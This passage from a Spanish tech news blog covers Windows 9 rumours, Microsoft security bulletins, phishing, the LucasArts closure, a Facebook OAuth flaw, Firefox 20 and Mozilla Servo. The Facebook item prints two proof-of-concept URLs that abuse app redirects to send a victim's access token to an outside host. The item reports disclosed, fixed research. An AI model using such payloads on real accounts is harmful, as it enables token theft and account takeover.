Curiosamente la fecha de este lanzamiento sería justo un año más tarde que su actual nuevo sistema operativo Windows 8 y tan solo dos meses después de la primera gran actualización de este, conocida en un principio bajo la denominación Blue y actualmente confirmada como Windows 8.1.

De producirse este hecho sería sin duda una sorpresa mayúscula, por si fuera poco ya lo era la suposición de que viera la luz el mismo mes del año 2014.

Por el momento solo se conoce de Windows 9, que incorporará el navegador Internet Explorer 11, versión esta en fase Beta que ya puede ser incluida en Windows 8.1, se producirá una mejora ostensible en el ámbito de la experiencia táctil del usuario en el sistema operativo e incluso se lanzaría una versión destinada a dispositivos móviles como smartphones, continuando el camino de su predecesor Windows 8, en el mercado de las tabletas.

Tratándose de que los chicos de Redmond, los cuales precisamente no están muy contentos con las ventas y la penetración de Windows 8, uno no puede poner la mano en el fuego.

De momento toca esperar y seguir a la expectación de nuevos datos más fiables y nuevas fechas más “apropiadas” a priori sobre el lanzamiento de  Windows 9, si es que este es el nombre elegido por los chicos de Redmond para su sistema operativo de nueva generación.

Microsoft publica 9 boletines de seguridad.

Microsoft ha publicado nueve boletines de seguridad que agrupan varias vulnerabilidades diferentes. Dos de los boletines son considerados como "críticos" y afectan al navegador Internet Explorer y al ActiveX del escritorio remoto. El resto de boletines restantes han sido clasificados como nivel "importante".

Resumimos los boletines y vulnerabilidades solucionadas:

  • MS13-028: (Internet Explorer): El boletín acumulativo resuelve dos vulnerabilidades que permiten ejecutar código arbitrario a través de Internet Explorer, en todas sus versiones.
  • MS13-029: Resuelve un grave problema de seguridad en el ActiveX de RDP (Escritorio Remoto) que podría permitir ejecutar código con solo visitar una web. El fallo se encuentra concretamente en la librería mstscax.dll.
 
Los boletines importantes son:

  • MS13-030: Un fallo en SharePoint permitiría a un atacante acceder a información sensible.
  • MS13-031: Resuelve dos vulnerabilidades en el kernel de Windows al tratar incorrectamente los objetos en memoria, que podrían permitir a un usuario elevar sus privilegios en el sistema. Afecta a toda la gama de Windows.
  • MS13-032: Un problema de consumo de recursos en LDAP podría permitir provocar una denegación de servicio. Afecta a toda la gama de Windows.
  • MS13-033: Un problema de elevación de privilegios en CSRSS. No se ven afectados Windows 7,8 o 2008 R2.
  • MS13-034: Un problema de elevación de privilegios en todo el software antimalware de Microsoft. Esto incluye desde Windows Defender, hasta la herramienta básica de eliminación de malware, pasando por toda la gama Forefront.
  • MS13-035: Un fallo a la hora de senear HTML en InfoPath 2010, SharePoint Server 2010, Microsoft Office Web Apps 2010 y Groove Server 2010, permitiría elevar privilegios a un atacante si abre un contenido especialmente manipulado.
  • MS13-036: Soluciona cuatro vulnerabilidades de elevación de privilegios en el driver Win32k y una en NTFS. Afecta a todos sus sistemas operativos.
Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche.

El Phishing genera pérdidas por más U$S 1.500 millones anuales.


Luego de 16 años de su aparición en las redes, el phishing o robo de identidad, caracterizado por solicitar a los usuarios información confidencial a través de correos electrónicos o páginas web aprócrifas, es todavía una de las amenazas principales que afecta tanto a usuarios como a consumidores. Tan sólo el año pasado, ocasionó pérdidas por más 1.500 millones de dólares, informó RSA Security [PDF], la división de software de seguridad de EMC Corporation.

En el 2012 se registró un promedio de más de 37.000 ataques en los que la táctica para robar identidad consiste en redireccionar un sitio web legítimo a uno ilegítimo, en el que se evita que los mensajes de correo electrónico sean bloqueados por un filtro de seguridad.

Otro tipo de ataques son los de "acción retardada" que utiliza una página de Internet segura cuya URL se distribuye vía correo electrónico, para luego quedar paralizada y que el malware pueda cargarse uno o dos días después.

Agregó que otras formas de robar la identidad es el secuestro de una dirección electrónica al registrarla con un dominio similar al legítimo, lo cual puede hacerse mediante el intercambio de letras, por lo que les recomendó verificar con cuidado la URL de una página electrónica.

Disney cierra LucasArts y despide 150 trabajadores.


Es una noticia muy triste para todos los amantes de los videojuegos, pero sobre todo para los amantes de las aventuras gráficas.

Hablar de LucasArts significa a trasladarme a mis años de infancia. La década de los 90' fue una época genial para los juegos de aventura gráfica, y el sello de LucasArts era inconfundible.

Sin embargo, fueron las aventuras gráficas las que triunfaron. Eran juegos que corrían bajo el sistema DOS (y Macintosh, Amiga, Atari, entre otros), en que aparecía el típico cursor (una crucecita) y las típicas opciones para ir guiando nuestro protagonista a través del juego.

Quién no recuerda uno de sus primeros juegos de gran éxito, "Maniac Mansion".


Seguido del Súper Éxito del que para mi fue uno de los mejores juegos de mi infancia, "Day of the Tentacle".


No hemos de olvidarnos de joyas como "The Secret of Monkey Island" (de hecho, ¿hay alguien que todavía no haya jugado a este juego?)


o Indiana Jones and the Fate of the Atlantis (creo que uno de los mejores juegos del arqueólogo).


Sinceramente han sido los mejores juegos de aventuras gráficas de la década de los 90', pero claro que eso no ha sido todo lo que nos ha dado "LucasArts" muchos recodaran los juegos que salieron posteriormente.

Uno de sus primeros grandes éxitos a fines de los 90' fue "Star Wars: The Phantom Menace" tanto en versión Playstation 1 como en su versión PC.


Y por último el juego que es considerado por muchos el mejor RPG en la historia de Star Wars, un juego que fue galardonado con el premio a mejor juego del año en 2003 (si exactamente hace 10 años atrás) y se convirtió en juego de culto para todos los seguidores de Star Wars.

En mi opinión es el mejor juego de RPG que jugué en mi vida y al cual le dediqué muchas, muchas, muchas horas de mi juventud, recuerdo aquellos años cuando le instalé este juego a mi gran amigo Martín....los buenos viejos tiempos.

El famoso Star Wars: Knights of the Old Republic (SWKotOR).


Este juego era increíble para su época, te permitía crear tu propio personaje con su propio nombre, tener tu propia nave y viajar al planeta que quisieras, vos elegías el camino que querías tomar, el lado oscuro o el lado de la luz, esto influenciaría en tus compañeros y en todo el desarrollo del juego, también dependiendo del camino a tomar tendrías 2 con finales completamente distintos.

Al año siguiente llego su secuela, la cual por presiones para que saliera a la venta antes de tiempo, hizo que el juego fuera lanzado incompleto por lo cual no pudo superar al primero, pero sigue siendo muy pero muy valorado por los fans, es más un grupo de programadores se dedicó a reconstruir las partes faltantes del juego y así dejarlo completo.

Fue el llamado Star Wars: Knight of the old Republic II The Sith Lords


Esto fue solo un pequeño resumen de lo que para mi fueron los mejores juegos que nos dió LucasArts, pero también hay muchos muchos más, como por ejemplo: Grim Fandango, Sam & Max, Zak McKracken, Full Throttle, Star Wars: Battlefront I y II.
   
La verdad es una lástima que una compañía tan importante y que ha aportado tanto al mundo de los videojuegos sea cerrada como si nada por Disney, sin dudas sus grandiosos juegos quedaran en nuestros recuerdos y esperemos que tal vez Disney recapacite y vuelva a poner en funcionamiento lo que una vez fue el Grandioso LucasArts.

¿Me he olvidado de algún otro juego épico de LucasArts que creen que debería estar en la lista?

Panel de Hackers vs Sheriff Security Officers.

En el marco de la 2da Jornada de Cibercrimen y Ciberterrorismo (2012), sobre el panel titulado "Hackers vs SSOs 2012: Si utilizas al enemigo para derrotar al enemigo, serás poderoso en cualquier lugar a donde vayas".

Panel conformado por SSO (Sheriff Security Officer) y Hackers, se reunieron para compartir, debatir y discutir puntos de vistas con respecto a la seguridad nacional y ciudadana en materia digital.

El disparador principal del panel se vinculó con el "Libro el Arte de la Guerra" de Sun Tzu y las menciones, frases y consejos totalmente aplicables a esta cuadro de situación de ciberguerra y ciberdelincuencia que día a día se potencia en nuestras vidas digitales.

Nueva vulnerabilidad en Facebook permite control de cuentas.


Nir Goldshlager ya había expuesto dos graves defectos en Facebook OAuth. La primera fue permitía hackear una cuenta de Facebook, sin que el usuario instale ninguna aplicación en su cuenta y la segunda mostraba diferentes maneras para eludir la protección de expresiones regulares en Facebook OAuth.

Ahora, Nir ilustra sobre un nuevo ataque que demuestra lo que sucede cuando se instala una aplicación en la cuenta de la víctima y cómo se la puede manipular. Según el hacker, si la víctima tiene una aplicación instalada como Skype o Dropbox, es capaz de tomar el control de sus cuentas.

Para esto, un atacante sólo necesita encontrar una vulnerabilidad de redirección URL o un Cross Site Scripting en el dominio del propietario de la aplicación de Facebook, como por ejemplo en Skype Facebook App. Además hay que tener en cuenta que los programas de recompensas (Bounty Programs) no consideran esto como una vulnerabilidad.

Nir también demostró que el ataque funciona incluso sin tener conocimiento de la aplicación que está utilizando la víctima. Ejemplo URL: https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m

Debido a que las aplicaciones de Facebook son desarrolladas por terceras partes, los dueños de la aplicación, Facebook no puede hacer nada para evitar ataques de redirección del sitio. El ataque trata de utilizar la falla en la redirección de la aplicación en el parámetro "redirect_uri, next" para robar el token de acceso de usuarios de Facebook.

POC (Using Skype app): https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (Using Dropbox app): https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

El objetivo del hacker es sólo robar el access_token a la víctima mediante el aprovechamiento de defectos en OAuth de Facebook y que posteriormente permiten tomar el control total sobre la cuenta de la víctima, sin conocer la contraseña.

El error se informó al equipo de seguridad de Facebook y ya fue corregido.

Codecs de Video y Audio.


Algo muy común que suele pasar a la hora de ver un vídeo o abrir un archivo de audio es que el reproductor no nos permita ejecutar el archivo diciendo que no tenemos el codec necesario para hacerlo.

Para dar solución a este problema te presentamos al "Combined Community Codec Pack" o mas conocido como "CCCP".

El CCCP es un pack de codecs que se destaca de los otros, asegurándonos que no es dañino ni conflictivo para nuestro sistema.

Antes de instalarse el Combined Community Codec Pack verifica si hay algún componente conflictivo de algún programa o de algún otro pack de codecs y nos pide permiso para desactivarlo.

Combined Community Codec Pack instala muchos codecs entre ellos:
  • Haali Media Splitter (MKV, MP4, OGM, AVI)
  • VSFilter (SSA/ASS, SRT, VOBSUB Subtitles)
  • ffdshow CCCP builds (H.264/AVC, DivX, XviD)
  • WMV9VCM (codecs Windows Media)
  • Media Player Classic.
  • Zoom Player Standard.
 


La  verdad es que con CCCP instalado en tu sistema ya no tendrás ningún problema de codecs a la hora de reproducir vídeo y audio!

Que les ha parecido? recomiendan otro?


Firefox 20 disponible.


Mozilla ha publicado la versión 20 del que para nosotros es el "mejor navegador" del mercado,a partir de hoy se encuentra en sus servidores FTP, esta nueva versión que integra dos nuevas características interesantes: un nuevo gestor de descargas y la navegación privada por ventana.

No estamos acostumbrados a ver cambios importantes en el navegador, pero Firefox 20 parece haber sido la excepción. En primer lugar hablaremos del nuevo y esperado gestor de descargas.

Básicamente se trata de un “centro” de descargas que se iniciará como nueva pestaña del navegador, bastante más cómodo que el método que se utilizaba hasta ahora (una nueva ventana). Si preferimos el anterior podremos deshabilitarlo accediendo a about:config y desactivar el parámetro browser.download.useToolkitUI.

Por otro lado encontramos una mejorada navegación privada, permitiendo ahora iniciar ventanas privadas sin necesidad de cerrar aquellas que ya estuviesen abiertas (tal y como ocurre en Google Chrome).

Es un cambio más bien sencillo pero muy demandado por los usuarios del navegador. Además de estas dos nuevas características se han solucionado diversos problemas, entre los cuales destaco: mejoras en el rendimiento (carga de páginas, descargas, apagado e inicio, etc), correcciones en HTML5 y en las herramientas para desarrolladores.




Yahoo! Mail ahora permite adjuntar archivos con Dropbox

Una de las características más potentes de Dropbox es su API, que permite que ese servicio sea integrado en otros, en ocasiones de maneras muy imaginativas y en otras ocasiones de maneras muy obvias.

Como obvio era que, tarde o temprano, empezara a aparecer en los servicios de correo electrónico Web.

Y es el caso de Yahoo! Mail, que desde hoy permite agregar archivos a nuestros correos directamente desde Dropbox, o guardarlos directamente a nuestro disco duro en la nube, con apenas un par de clicks de distancia.

Otra ventaja que tiene esta integración es que ahora es posible enviar adjuntos de más de 25MB. No obstante hay que tener en cuenta que no es algo del todo nuevo; Outlook.com permite enviar archivos vía SkyDrive desde hace tiempo, y Gmail también lleva buenos meses integrado con Google Docs y Google Drive.

Sea lo que sea, una característica que sin duda hará las delicias de los usuarios del correo electrónico de Yahoo!.

Windows Blue se llamará Windows 8.1



Ya hemos hablado en muchas ocasiones acerca de Windows Blue, y eso que hemos recibido bien poca información por parte de Microsoft. Lo último que vimos fueron unas capturas filtradas de los cambios que recibirá su interfaz gráfica.

También sabíamos que Windows Blue no es más que un nombre en clave utilizado dentro de Microsoft para referirse a esta ola de actualizaciones. Lo que no conocíamos era su nombre oficial, y parece que, de puertas hacia fuera, será Windows 8.1. La captura superior, que deberemos tomar con la cautela habitual, proviene de Winforum.eu

Windows 8.1






Mozilla y Samsung se unen para crear Servo.

Mozilla y Samsung 
El impulso de Mozilla para mejorar cada vez más la web parece que no tenga fin. Hace unos días anunciaban Unreal Engine para la web, y hoy una alianza con Samsung para construir un nuevo motor para renderizar páginas web, Servo.

¿Por qué un nuevo motor de renderizado, si Gecko ya está muy maduro? La razón que esgrime Mozilla es que quieren hacer un nuevo motor con vistas al futuro: optimizado para dispositivos con varios núcleos y con un enfoque de seguridad por defecto.

Para construir Servo, Mozilla está creando un nuevo lenguaje de programación, Rust, precisamente orientado a entornos de multiprogramación y seguros, sin posibilidad de vulnerabilidades por buffer overflow o por punteros nulos (no existe el valor null en Rust).

Samsung también está colaborando en la creación con su experiencia en móviles: ya creó un motor de ejecución para Rust en arquitecturas ARM, así que el tema les resulta muy familiar.

Como no podía ser menos viniendo de Mozilla, Servo es software libre y ya lo podéis probar descargándolo y compilándolo desde el repositorio de Github. Sólo necesitaréis OS X o Linux, ambos de 64 bits.

Lo cierto es que Mozilla está haciendo un gran trabajo últimamente. Están buscando lo mejor para sus intereses, sí, pero lo hacen devolviendo el trabajo a la comunidad, manteniendo todo abierto y sin vallas. Desde luego, una alternativa bien planteada al enfoque de “para una buena experiencia tienes que controlar tú todo” que últimamente domina en el mundo del software. Y, personalmente, creo que les puede salir muy bien.